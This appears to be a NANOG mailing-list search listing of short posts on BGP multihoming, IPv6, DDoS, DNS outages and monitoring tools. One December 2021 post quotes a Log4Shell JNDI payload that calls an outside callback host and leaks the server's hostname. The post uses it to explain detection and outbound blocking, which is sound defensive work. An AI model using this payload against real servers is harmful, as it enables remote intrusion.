Hi Tom,
This is exactly what I was planning.
I'm announcing a block via ISP1 and another set of blocks via ISP2, and
have iBGP running between them.
Thanks a lot!!
Best regards,
On Fri, Dec 27, 2024 at 1:00 PM Tom Beecher wrote:
> Jean-
>
> Yeah, don't worry about
Hi guys,
I've been on the list for as long as I cannot even remember.
So just you know, I'm not new at this.
This is no easy task, that's why I came here looking for help.
I'm sorry if I brought anguish to the experts on the list!
I thought I could bring something that someone may have experienced
Thanks Bill for the well explanation!
I'll probably will have to go into the communities then, some of tests I've
done got me nowhere!
I'm using VyOS (quagga) and prepending didn't help.
Best regards,
On Tue, Dec 24, 2024 at 12:42 AM William Herrin wrote:
> On Mon, Dec 23, 2024 at 4:53 PM Chri
Hi Chris,
Thank you for taking your time and point me in the right direction!
I'm getting full routes, so it should be easy for me to achieve your
concept.
Best regards,
On Mon, Dec 23, 2024 at 9:53 PM Christopher Hawker
wrote:
> Hi Jean,
>
> You can establish an iBGP session b
Hi Folks,
I'm trying to achieve total redundancy on a multihomed environment:
ISP 1 <=> Router 1 <= X => Router 2 <=> ISP 2
Where X is my Network.
In the example below, he announces separate blocks to each ISP.
https://www.networkstraining.com/cisco-bgp-configuration-tutorial/
I would like to
On 2024-08-02 21:39, Jean-Francois Mezei wrote:
> Following process, redacted portions of the XONA Partners report have
> been published.
>
> https://crtc.gc.ca/otf/eng/2022/8000/c12-202203868.htm
I have some question on terminology: (pardon my newbieness, just wanting
to be
After a July 2022 outage that caused the whole Rogers network to go down
for an extended period (bring down the single homed Interac payment
system with it across Canada), political pressure caused CRTC to have a
process to look into it. Part of it was the commissioning of a report by
experts.
Fo
Hi all,
We're very happy with Zammad, it integrates well with another open source
monitoring solution (Zabbix).
We're also using it for task management. It allows to put the time spent on
each task, and if you don't finish it, it keeps sending reminders each day.
We migrated it from OTRS a few yea
Hi Tom.
Ubiquiti EdgeRouter Infinity.
Best regards,
On Mon, May 13, 2024 at 3:54 PM Tom Samplonius wrote:
>
> What are using for small campus border routers? So four to eight 10G
> ports with a FIB for full scale L3?
>
>
> Tom
>
>
>
g many other
> things..
>
>
>
> Brandon
>
>
>
> *From:* NANOG *On
> Behalf Of *Jean Franco
> *Sent:* Tuesday, June 13, 2023 11:12 AM
> *To:* North American Network Operators' Group
> *Subject:* Software to document fiber networks - in house only
>
>
Hi all,
I know this must have been on the table before, but I'm looking for a
in-house solution, something I can host on our own datacenter to document
fiber networks, maps and so forth.
Thank you!
Jean
https://frrouting.org/
On Mon, May 1, 2023 at 2:28 PM Josh Luthman
wrote:
> Doesn't VyOS simply use Quagga?
>
> On Mon, May 1, 2023 at 12:09 PM Jean Franco wrote:
>
>> Hi,
>>
>> VyOS
>>
>> Best regards,
>>
>> On Mon, May 1, 2023 at 1:
Hi,
VyOS
Best regards,
On Mon, May 1, 2023 at 1:03 PM Bryan Fields wrote:
> I know best subjective, but I'm looking at a project to announce some IP
> space
> that's between uses now and see what's there. I'm planing to run a flow
> logger and ntop on the VM and see what is coming in if anyth
computer. Protonmail won't help you to keep
your digital life secure.
This email was sent by a secure infrastructure using TLS 1.2 and clear text dns.
Thank you
Jean
-Original Message-
From: NANOG On Behalf Of Laura Smith
via NANOG
Sent: January 28, 2022 5:15 AM
To: Mel Beckma
personal favorites are a mix of:
* Ntop with PF_RING enabled.
* Nfdump
* Elasticsearch
I’m sure all the other tools are also very good. Csv in excel or grep/awk could
also work if you know exactly what you’re looking for. 😉
Jean
From: NANOG On Behalf Of
Cloudlfare might be able to help, but dns flood might be spoofed.
It's possible that Cloudflare is not the one sending you that junk.
Is it UDP DNS flood or it's some kind of DNS of TCP/Https?
Jean
> On 1/7/2022 11:06 AM, Mike Hale wrote:
the issue we're seeing (a massive DNS flood).
Indeed, it is extremely used.
This new threat seems to behave like a worm. What was the last worm-like virus?
I recall sql slammer or something like that in early 2000.
Was there any other very popular worm between 2003 and now?
Thanks
Jean
From: NANOG On Behalf Of Alain
p in clear text on your gears.
At ISP level, visibility is a must and patterns will clearly become easy to
identify.
I agree with Karl that perfection is enemy of good.
Jean
-Original Message-
From: NANOG On Behalf Of Karl Auer
Sent: December 13, 2021 7:55 AM
To: NANOG List
Subject:
This should translate in a query from your infected server toward an infected
server controlled by a malicious hacker on port 389.
x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
Right?
Jean
-Original Message-
From: Jörg Kost
Sent: December 13, 2021 6
What your netflows, pflow, whatever logging system you have show on port 389,
636 in the last 4 days?
If you reply nothing... I will admit my mistake here publicly. I will be happy
to be wrong in your face.
Jean
-Original Message-
From: Saku Ytti
Sent: December 13, 2021 6:33 AM
To
In these situation it's time to unite with the server admins and not let them
figure out all the patching.
It's possible to see it live crawling in your network. Why let something
harmful continue to crawl and spread?
Jean
-Original Message-
From: Saku Ytti
Sent: Decembe
You are right, but it's still a good place to start looking.
What do you recommend? Panic?
It won't help you.
Jean
-Original Message-
From: Jörg Kost
Sent: December 13, 2021 6:01 AM
To: Jean St-Laurent
Cc: Nick Hilliard ; Andy Ringsmuth ;
nanog@nanog.org
Subject:
ity in the https, but you should be
able to see your servers querying weird stuff on internet on port 389/636.
Just don't allow your important hosts to fetch payload on internet on port
389/636.
Et voila! Look to the left, not to the right.
Jean
-Original Message-
From: NANOG On
.
Not much people need an accurate 100% of netflow exports. If you need 100%
accuracy, then you need dedicated hardware.
0% or totally disabled is also often very good enough if you don’t need
visibility. 😊
Netflow is useful in my opinion, but maybe not for every case.
Jean
From
I understand now and I agree with you that there’s something fishy there.
Fear sells.
Thanks
Jean
From: Ca By
Sent: December 9, 2021 10:47 AM
To: Jean St-Laurent
Cc: Arne Jensen ; nanog@nanog.org
Subject: Re: Anyone else seeing DNSSEC failures from EU Commission ?
(european
What is a ddos death spiral?
Jean
From: NANOG On Behalf Of Ca By
Sent: December 9, 2021 9:36 AM
To: Arne Jensen
Cc: nanog@nanog.org
Subject: Re: Anyone else seeing DNSSEC failures from EU Commission ?
(european-union.europa.eu)
and you feeding the vendor / hacker ddos death spiral
you in advance for your time and patience
Jean
From: Tom Beecher
Sent: December 6, 2021 3:04 PM
To: Jean St-Laurent
Cc: Mark Tinka ; NANOG
Subject: Re: private 5G networks?
To come back on Private 5G networks. Can a private 5G network protect against
spyware like Pegazus?
No
I thought it would have been possible to tap some firewalls at 5G level to
inspect what comes in/out. Suspicious traffic toward known C&C would be
investigated.
I have no clue how Pegasus or 5G works.
Thanks for the info
Jean
From: Tom Beecher
Sent: December 6, 2021 3:04 P
't generate fud.
Telco are at the moment in a much better position than cloud providers in my
opinion. The train started to anticipate the curve and it's already changing
direction.
To come back on Private 5G networks. Can a private 5G network protect against
spyware like Pega
ll be more important. The decisions they make today and
the partners they choose will set the direction for this train.
Maybe cloud boys and girls are also about to get a fair shake.
Be patient
Jean
-Original Message-
From: Mark Tinka
Sent: December 6, 2021 8:23 AM
To: Jean St-Laurent ; nanog
.
While at it, make sure you tell your CFO that you want it on IPv6. 😊
Jean
-Original Message-
From: NANOG On Behalf Of Mark Tinka
Sent: December 6, 2021 7:46 AM
To: nanog@nanog.org
Subject: Re: private 5G networks?
On 12/4/21 16:52, Jean St-Laurent via NANOG wrote:
> Maybe
still perfectly run in a private
5G network?
Jean
file.
Jean
From: NANOG On Behalf Of Baldur
Norddahl
Sent: November 29, 2021 4:22 AM
To: NANOG
Subject: Re: IPv6 and CDN's
man. 29. nov. 2021 02.12 skrev Masataka Ohta mailto:mo...@necom830.hpcl.titech.ac.jp> >:
> The only way to truly reduce Opex at scale
ISP.
Do you go by zip code of the area covered or some kind of logical to help
people know what is behind that ipv6 network?
Jean
From: NANOG On Behalf Of Baldur
Norddahl
Sent: November 28, 2021 8:22 AM
To: NANOG
Subject: Re: IPv6 and CDN's
søn. 28. nov. 2021 13.59
Ipv6 can be shorter than ipv4.
Here is the proof:
ping6 ::1
is shorter than
ping 127.1
ipv6 addresses can be very small when done properly.
Jean
-Original Message-
From: NANOG On Behalf Of Mark Tinka
Sent: November 28, 2021 5:39 AM
To: nanog@nanog.org
Subject: Re: IPv6 and CDN&#
But CFOs like monetization. Was that thread about IPv6 or CFO?
From: Michael Thomas
Sent: November 26, 2021 7:37 PM
To: Oliver O'Boyle
Cc: Jean St-Laurent ; Ca By ; North
American Network Operators' Group
Subject: Re: IPv6 and CDN's
That's a start, I guess. Bef
c.com> > wrote:
On 11/26/21 1:44 PM, Jean St-Laurent via NANOG wrote:
Here are some maths and 1 argument kicking ass pitch for CFO’s that use iphones.
Apple tells app devs to use IPv6 as it's 1.4 times faster than IPv4
https://www.zdnet.com/article/apple-tells-app-devs-to-use-ipv6-
With that specific line directly from Apple:
"And when IPv6 is in use, the median connection setup is 1.4 times faster than
IPv4. This is primarily due to reduced NAT usage and improved routing."
There it is, Improved routing.
Jean
From: Jean St-Laurent
Sent: November
Here are some maths and 1 argument kicking ass pitch for CFO’s that use iphones.
Apple tells app devs to use IPv6 as it's 1.4 times faster than IPv4
https://www.zdnet.com/article/apple-tells-app-devs-to-use-ipv6-as-its-1-4-times-faster-than-ipv4/
Build around that maybe?
Jean
With a kicking ass pitch
-Original Message-
From: NANOG On Behalf Of Mark Tinka
Sent: November 26, 2021 5:52 AM
To: nanog@nanog.org
Subject: Re: IPv6 and CDN's
On 11/3/21 22:13, Max Tulyev wrote:
> Implementing IPv6 reduces costs for CGNAT. You will have (twice?) less
> traffic flow
smokeping in master slave mode. A bit old school, but maybe still worth a try.
https://oss.oetiker.ch/smokeping/doc/smokeping_master_slave.en.html
Jean
From: NANOG On Behalf Of Adam
Thompson
Sent: November 25, 2021 1:31 PM
To: Hugo Slabbert ; Thomas Scott
Cc: nanog
Subject: RE
https://www.ncsc.nl/actueel/nieuws/2021/oktober/29/aanstaande-bekendmaking-cvd-procedure-rpki
-Original Message-
From: NANOG On Behalf Of Niels Bakker
Sent: October 29, 2021 2:01 PM
To: nanog@nanog.org
Subject: Re: possible rsync validation dos vuln
* nanog@nanog.org (Jean St-Laurent
The link doesn't work. 404
https://www.ncsc.nl/actueel/nieuws/2021/oktober/29/aanstaande-bekendm
What are the specs of that possible dos vuln?
Is is reflection or amplification or something else?
Thanks
Jean
also lost physical access to the building.
We all learned a lot and we're still learning.
Jean
-Original Message-
From: Bill Woodcock
Sent: October 7, 2021 12:45 PM
To: Jean St-Laurent
Cc: Masataka Ohta ; Bjørn Mork
; nanog@nanog.org
Subject: Re: DNS pulling BGP routes?
Thi
Nice document.
In section 2.5 Routing, this is written:
Distributing Authoritative Name Servers via Shared Unicast Addresses...
organizations implementing these practices should
always provide at least one authoritative server which is not a
participant in any shared unicast mesh.
Could i
Something public that we know now, is that it's possible to totally shut down
facebook and restart it.
Can we shutdown the full internet one day and see if it will restart properly
without too much hack here and there?
Jean
-Original Message-
From: NANOG On Behalf Of Mark Tinka
happening.
It seems to be really resilient in today’s world, a business needs their NS in
at least 2 different entities like amazon.com is doing.
Jean
From: NANOG On Behalf Of Matthew
Kaufman
Sent: October 5, 2021 10:59 AM
To: Mark Tinka
Cc: nanog@nanog.org
Subject: Re: Facebook post
Does anyone have info whether this network 69.171.240.0/20 was reachable during
the outage.
Jean
From: NANOG On Behalf Of Tom Beecher
Sent: October 5, 2021 10:30 AM
To: NANOG
Subject: Re: Facebook post-mortems...
People keep repeating this but I don't think it's true.
As of now, their MX is hosted on 69.171.251.251
Was this network still announced yesterday in the DFZ during the outage?
69.171.224.0/19
69.171.240.0/20
Jean
From: Jean St-Laurent
Sent: October 5, 2021 9:50 AM
To: 'Tom Beecher'
Cc: 'Jeff Tantsura' ; '
I agree to resolve non-routable address doesn’t bring you a working service.
I thought a few networks were still reachable like their MX or some DRP
networks.
Thanks for the update
Jean
From: Tom Beecher
Sent: October 5, 2021 8:33 AM
To: Jean St-Laurent
Cc: Jeff Tantsura ; William
use 2 different entities for DNS is not
financially viable?
Jean
-Original Message-
From: NANOG On Behalf Of Mark Tinka
Sent: October 5, 2021 8:22 AM
To: nanog@nanog.org
Subject: Re: Facebook post-mortems...
On 10/5/21 14:08, Jean St-Laurent via NANOG wrote:
> Maybe withdrawi
work" would have help here.
Can you elaborate a bit please?
Jean
-Original Message-
From: NANOG On Behalf Of Glenn Kelley
Sent: October 4, 2021 8:18 PM
To: nanog@nanog.org
Subject: Re: massive facebook outage presently
This is why you should have Routers that are Firmware Defa
.uk.
pdns1.ultradns.net.
$ dig +short netflix.com NS
ns-1372.awsdns-43.org.
ns-1984.awsdns-56.co.uk.
ns-659.awsdns-18.net.
ns-81.awsdns-10.com.
Amnazon and Netflix seem to not keep their eggs in the same basket. From a
first look, they seem more resilient than facebook.com, google.com and apple
c.ns.facebook.com.
facebook.com. 172800 IN NS d.ns.facebook.com.
What happens if the NS aren’t back within 48 hours?
Jean
From: NANOG On Behalf Of Eric Kuhnke
Sent: October 4, 2021 4:33 PM
To: Jay Hennigan ; nanog@nanog.org list
Subject: Re: massive facebook outage presently
Maybe the key to solve this issue is in an email sent to
some_very_important_t...@facebook.com
-Original Message-
From: NANOG On Behalf Of tomocha
Sent: October 4, 2021 2:32 PM
To: nanog@nanog.org
Subject: Re: massive facebook outage presently
Hi
Some of the DNS addresses are no longer
Friday is always a good day to do such change. :D
-Original Message-
From: NANOG On Behalf Of Mark Tinka
Sent: October 2, 2021 2:17 AM
To: Bill Woodcock
Cc: nanog@nanog.org
Subject: Re: slack.com
On 10/2/21 08:14, Bill Woodcock wrote:
> We did not use an NTA, but we did flush our cac
I understand better why some prefer acl vs uRpf.
For sure, forwarding 400 Gbps of 80B frames is a sign that something bad is
happening. 😉
Jean
-Original Message-
From: brad dreisbach
Sent: September 29, 2021 4:18 PM
To: Jean St-Laurent
Cc: 'brad dreisbach' ; &#
Thanks a lot for sharing.
So 100 Gbps at line rate with 80B frames is about ~150 Mpps.
100 Gbps at line rate with 208B frames is about ~60 Mpps.
It's a significant penalty.
Jean
-Original Message-
From: brad dreisbach
Sent: September 29, 2021 3:33 PM
To: Jean St-Laurent
Cc:
Hi Brad,
I'd be interested to hear more about this pps penalty. Do we talk about 5%
penalty or something closer to 50%?
Let me know if you still have some numbers close to you related to PPS with
uRPF loose.
Thanks
Jean
-Original Message-
From: NANOG On Behalf Of brad
drei
It’s still on going?
It’s been more than a week now. I thought these were resolve already.
Ransomware are down since few months. I guess that’s why DDoS with ransom are
back on the rise.
Jean
From: NANOG On Behalf Of Mel Beckman
Sent: September 27, 2021 5:56 PM
To: babydr DBA
What is the average price per ip address for /24 with good reputation vs /24
with questionable reputation?
Can you extrapolate too to /21 and /20?
Jean
From: NANOG On Behalf Of Tony Wicks
Sent: August 5, 2021 4:08 PM
To: 'NANOG'
Subject: RE: Where to get IPv4 block
layer 2.
I would go that route as it is also a very common setup these days. It scales
well horizontally and no active/passive. It’s just
active/active/active/active…./active.
Jean
Great list.
ShadowServer is there twice on page 7. They must be noisy 😉
Jean
-Original Message-
From: NANOG On Behalf Of Hank
Nussbacher
Sent: June 28, 2021 2:50 PM
To: nanog@nanog.org
Subject: Re: shadowserver.org
> What is the difference between shodan.io and shadowserver.
What is the difference between shodan.io and shadowserver.org ?
Jean
I agree with you that 100% secure is not achievable.
The goal is to make your business very difficult to hack that it is no longer
economically viable for terrorists to attack it in the first place.
That’s the best insurance you can give to your business.
Jean
e tax-deductible".
Published June 21st.
https://www.cbsnews.com/news/ransomware-payments-may-be-tax-deductible/
Again from cbsnews. Not sure if we can rely on them to report accurate news?
Jean
-Original Message-
From: NANOG On Behalf Of Jim
Sent: June 25, 2021 8:26 AM
To: Brandon Svec
Jean
From: NANOG On Behalf Of Michael
Thomas
Sent: June 24, 2021 5:59 PM
To: JoeSox
Cc: nanog@nanog.org
Subject: Re: Can somebody explain these ransomwear attacks?
On 6/24/21 2:55 PM, JoeSox wrote:
It gets tricky when 'your' company will lose money $$$ while you wait a
find the devices that don't follow this behaviour, right?
Jean
-Original Message-
From: Fernando Gont
Sent: June 10, 2021 7:09 AM
To: j...@ddostest.me; nanog@nanog.org
Subject: Re: NAT devices not translating privileged ports
Hi, Jean,
On Thu, 2021-06-10 at 06:54 -0400, Jean
evices.
Maybe you meant multiple NTP servers behind the same NAT to external NTP server?
Thanks
Jean
Bingo!
With the -t raw, you can bypass the 1.2 Mpps limitation in iptables per
cpusocket, because it's doing a very early drop without crossing the full
iptables kernel modules.
You can reach close to wrirespeed with the -t raw compare to using the same
iptables without -t raw.
Thanks for the update.
Is amazon publishing that old techno since long time or it just appeared
recently?
I don’t recall seeing that with amazon-ses.com.
Jean
From: NANOG On Behalf Of Matthew V
Sent: June 7, 2021 2:07 PM
To: nanog@nanog.org
Subject: Re: amazon.com multiple SPF
What is spf2.0/pra ?
Is this new?
Jean
From: NANOG On Behalf Of Alec
Peterson
Sent: June 7, 2021 10:35 AM
To: Brad Barnett
Cc: nanog@nanog.org
Subject: Re: amazon.com multiple SPF records
Hmm, are you sure?
[ec2-user@ip-10-0-0-50 ~]$ dig amazon.com <http://amazon.com>
ng to achieve?
Jean
-Original Message-
From: NANOG On Behalf Of Fernando
Gont
Sent: June 4, 2021 3:00 AM
To: nanog@nanog.org
Subject: NAT devices not translating privileged ports
Folks,
While discussing port randomization (in the context of
https://www.ietf.org/archive/id/draft-ietf-ntp
e
been fix or improve.
Finally, can you share with us which provider doesn't filter BCP38 in their
uplink? #JustCurious. 😊
Jean
-Original Message-
From: NANOG On Behalf Of Stephen
Satchell
Sent: June 2, 2021 12:41 AM
To: nanog@nanog.org; sa...@ine.com
Subject: BCP38 on publi
Hey Rob, quick question for you.
Are you able to see the connection ID when you are forwarding the frames and
doing NAT?
I thought this is encrypted. Can you confirm?
Thanks
Jean
-Original Message-
From: NANOG On Behalf Of Jean
St-Laurent via NANOG
Sent: June 1, 2021 6:51 AM
To
increase a bit.
Anyone?
Jean
P.S.: I'm not a fan of Quic. It's opening the gates to massive DDoS for
Akamai and all the others CDN. Good luck
-Original Message-
From: NANOG On Behalf Of Robert
Brockway
Sent: May 31, 2021 11:15 PM
To: The source of all things networking
Sub
become very resilient to DDoS attacks, your customers will thank
you and also support staff that will see the DDoS bounce like mosquitoes on the
windshield of your car at 90 Mph.
Start learning now and start improving your DDoS. This won’t go away anytime
soon.
Jean
From: jim deleskie
.
@Baldur: do you care to share some metrics?
Jean
From: NANOG On Behalf Of Jean
St-Laurent via NANOG
Sent: May 21, 2021 10:52 AM
To: 'Lady Benjamin Cannon of Glencoe, ASCE' ; 'Baldur Norddahl'
Cc: 'NANOG Operators' Group'
Subject: RE: DDoS attack with blackma
I also recommend book Art of War from Sun Tzu.
All the answers to your questions are in that book.
Jean
From: NANOG On Behalf Of Lady
Benjamin Cannon of Glencoe, ASCE
Sent: May 20, 2021 7:18 PM
To: Baldur Norddahl
Cc: NANOG Operators' Group
Subject: Re: DDoS attack with blac
x, telnet, ipmi, web scenarios, etc
(never face a coirner-case that can't be monitored so far)
Really awesome at infrastructure level.
Jean
-Original Message-
From: NANOG On Behalf Of Saku Ytti
Sent: May 17, 2021 3:34 AM
To: Sander Steffann
Cc: Michael Fiumano ; nanog list
I just unlocked ddostest.me with this tool for outlook.com, Hotmail.com,
msn.com and maybe all the O365 suite.
It was fix in less than 24 hours.
Thanks for the tip
Jean
From: NANOG On Behalf Of Mike Hammett
Sent: April 28, 2021 7:52 AM
To: Michael Fallen
Cc: nanog@nanog.org
Subject
I’d be interested in an objective recap of this thread.
It seems like we could do a Netflix series for networkers about it. 😉
Anyone would like to give it a try to summarize the story back from the 80’s
till today and explain what is at stake here?
Thanks
Jean
From: NANOG On
This is true and very interesting, but the opposite is also true.
They are now reachable from probably nearly anywhere and therefore open for
business. 😊
Let's see what will slowly appear in shodan.io and shadowserver.org
Jean
-Original Message-
From: NANOG On Behalf Of Wi
Nice article explaining a specific BGP corner case not removing routes when
TCP window reaches 0.
https://blog.benjojo.co.uk/post/bgp-stuck-routes-tcp-zero-window
The proposed solution is a new RFC for BGP with the suggestion to introduce
a new timer.
Fascinating!
Jean St-Laurent /CISSP
I was not sure what a TI-99/4a is. I thought it's a new kind of phone.
Lol
You got me!
Jean
-Original Message-
From: NANOG On Behalf Of Jared Mauch
Sent: April 10, 2021 7:10 PM
To: Laura Smith
Cc: nanog@nanog.org
Subject: Re: Google IP Geolocation
I've had a similar is
y to complain about it.
On Thu, Apr 1, 2021 at 1:21 PM Niels Bakker mailto:na...@bakker.net> > wrote:
* nanog@nanog.org <mailto:nanog@nanog.org> (Jean St-Laurent via NANOG) [Thu 01
Apr 2021, 21:03 CEST]:
>An artificial roll out penalty somehow? Probably not at the ISP
>lev
solution.
In the end, if I search on this mailing list:
Wow, spike, huge, akamai, yesterday or a combination of these words… the answer
is always CoD. 😃
Jean
From: NANOG On Behalf Of Patrick W.
Gilmore
Sent: April 1, 2021 4:09 PM
To: North American Operators' Group
Subjec
This would be a good compromises for all.
Slowly deliver the assets few days/weeks ahead.
Then, on April 1st at this exact same second, you open the gate.
@Mike: bull’s eye!
Jean
From: NANOG On Behalf Of Mike Hammett
Sent: April 1, 2021 3:31 PM
To: Niels Bakker
Cc: nanog
@nanog.org
Subject: Re: wow, lots of akamai
On Thu, Apr 1, 2021 at 12:23 Niels Bakker mailto:na...@bakker.net> > wrote:
* nanog@nanog.org <mailto:nanog@nanog.org> (Jean St-Laurent via NANOG) [Thu 01
Apr 2021, 21:03 CEST]:
>An artificial roll out penalty somehow? Probably not at
No I didn't suggest that.
-Original Message-
From: NANOG On Behalf Of Niels
Bakker
Sent: April 1, 2021 3:21 PM
To: nanog@nanog.org
Subject: Re: wow, lots of akamai
* nanog@nanog.org (Jean St-Laurent via NANOG) [Thu 01 Apr 2021, 21:03 CEST]:
>An artificial roll out penalty
: Hey I was
curious what happened and I thought to ask here on NANOG?
#JustCurious
Jean
-Original Message-
From: NANOG On Behalf Of
aar...@gvtc.com
Sent: April 1, 2021 12:12 PM
To: 'Jared Mauch' ; 'Töma Gavrichenkov'
Cc: 'NANOG'
Subject: RE: wow, lots of
Good analyze Hugo,
I believe that all of this volumetric attack is just noise to hide the real
attack that really killed your webserver.
TCP Flag: SYN: 100%
I would start with this line and I agree that Roland’s deck might have
something about SYN flood.
Jean
From: Hugo
.
Peace
Jean
From: Mike Hammett
Sent: February 8, 2021 12:56 PM
To: Jean St-Laurent
Cc: NANOG list
Subject: Re: Retalitory DDoS
I don't have RTBH, no. It's just a web server.
Now how my hosting provider handled it, I'm not sure. I don't know if they just
dropp
You got RTBH?
From: Mike Hammett
Sent: February 8, 2021 12:50 PM
To: Jean St-Laurent
Cc: NANOG list
Subject: Re: Retalitory DDoS
In my case, it was against a server not on my own network, so my impact was a
blackhole for an hour at 4 AM local time. I likely wouldn't have even no
Nice report,
If you would have to pick up just one vector out of this “multi-vector” attack,
which one seems to be the one that had the bigger effect on your network or
service?
Was it degraded or total service interruption?
Jean
From: NANOG On Behalf Of Mike Hammett
Sent
used-for-c-c-and-data-exfiltration/
Could it be that what the OP observed is link to a browser vulnerability
started to be exploited recently?
Cheers,
Jean
From: NANOG On Behalf Of Joe
Sent: February 5, 2021 9:51 AM
To: JoeSox
Cc: NANOG
Subject: Re: Suspicious IP reporting
Much
I do not know Tom personally, but I’ve been following his comments, hindsight
and shared experience. Tom seems to be a bigger player than you on this mailing
list.
Joe, you are only penalizing yourself by banning him. I would personally not
ban him.
J
From: Jean St-Laurent
Sent
/infrastructure/googles-dunant-subsea-cable-is-now-ready-for-service
Kill this link and I guess the industry will listen to you.
Good luck with your ip in China.
Jean St-Laurent
From: NANOG On Behalf Of JoeSox
Sent: February 4, 2021 6:06 PM
To: Tom Beecher
Cc: NANOG
Subject: Re
20.4R1-EVO, and all subsequent
releases.
It has a cvss score of 10.0 which is the highest.
Is Juniper still vulnerable or not?
Thanks
<https://www.engardesecurite.ca/wp-content/uploads/2018/11/main1-1-214x300.gif>
Jean St-Laurent
CISSP #634103
ddosTest me securit
This one ended up in Junk. I guess you pasted too much domain names with "Junk"
behaviours. 😉
I removed the domain names from this reply.
Interesting list though. Thanks for sharing. Any others got that in their junk?
Jean St-Laurent
CISSP #634103
ddosTest me security inc
si
1 - 100 of 437 matches
Mail list logo
